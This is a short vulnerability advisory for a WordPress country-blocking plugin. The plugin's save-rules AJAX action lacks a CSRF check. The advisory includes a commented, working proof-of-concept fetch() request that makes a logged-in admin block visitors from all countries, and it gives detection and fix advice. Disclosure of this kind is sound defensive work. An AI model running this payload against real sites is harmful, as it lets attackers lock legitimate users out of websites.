The plugin does not have a CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged-in admin block an arbitrary country, or block all of them at once, preventing users from accessing the frontend.
Make an admin open a page with the following code in it, which will ban visitors from all countries:
// Reproduction request for the report above: a cross-site POST to admin-ajax.php.
// Security-relevant point: the body carries NO nonce field (no `_wpnonce` /
// `security` parameter), yet the page states the action still applies the rule,
// i.e. the handler never calls check_ajax_referer() / wp_verify_nonce().
// `credentials: "include"` is what makes this CSRF: the victim admin's session
// cookie is attached by the browser. Detection: admin-ajax.php POSTs for this
// action whose Origin/Referer header is not the site's own host.
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
// Form encoding keeps the request "simple" for CORS purposes, so no preflight
// is sent and the browser delivers the POST without the target's consent.
"content-type": "application/x-www-form-urlencoded",
},
// `countries[]` = "nonexistent" with `mode` = 0 is the payload the report says
// bans visitors from every country; the meaning of `mode` is not shown here —
// confirm against the plugin's handler.
"body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
"method": "POST",
// Sends the victim's WordPress auth cookies; the admin must be logged in.
"credentials": "include"
})
// Response is only echoed for confirmation; the state change has already happened
// server-side. Fix on the plugin side: verify a nonce (check_ajax_referer) and a
// capability (current_user_can) before saving the rules.
.then(response => response.text())
.then(function(data) { console.log(data); });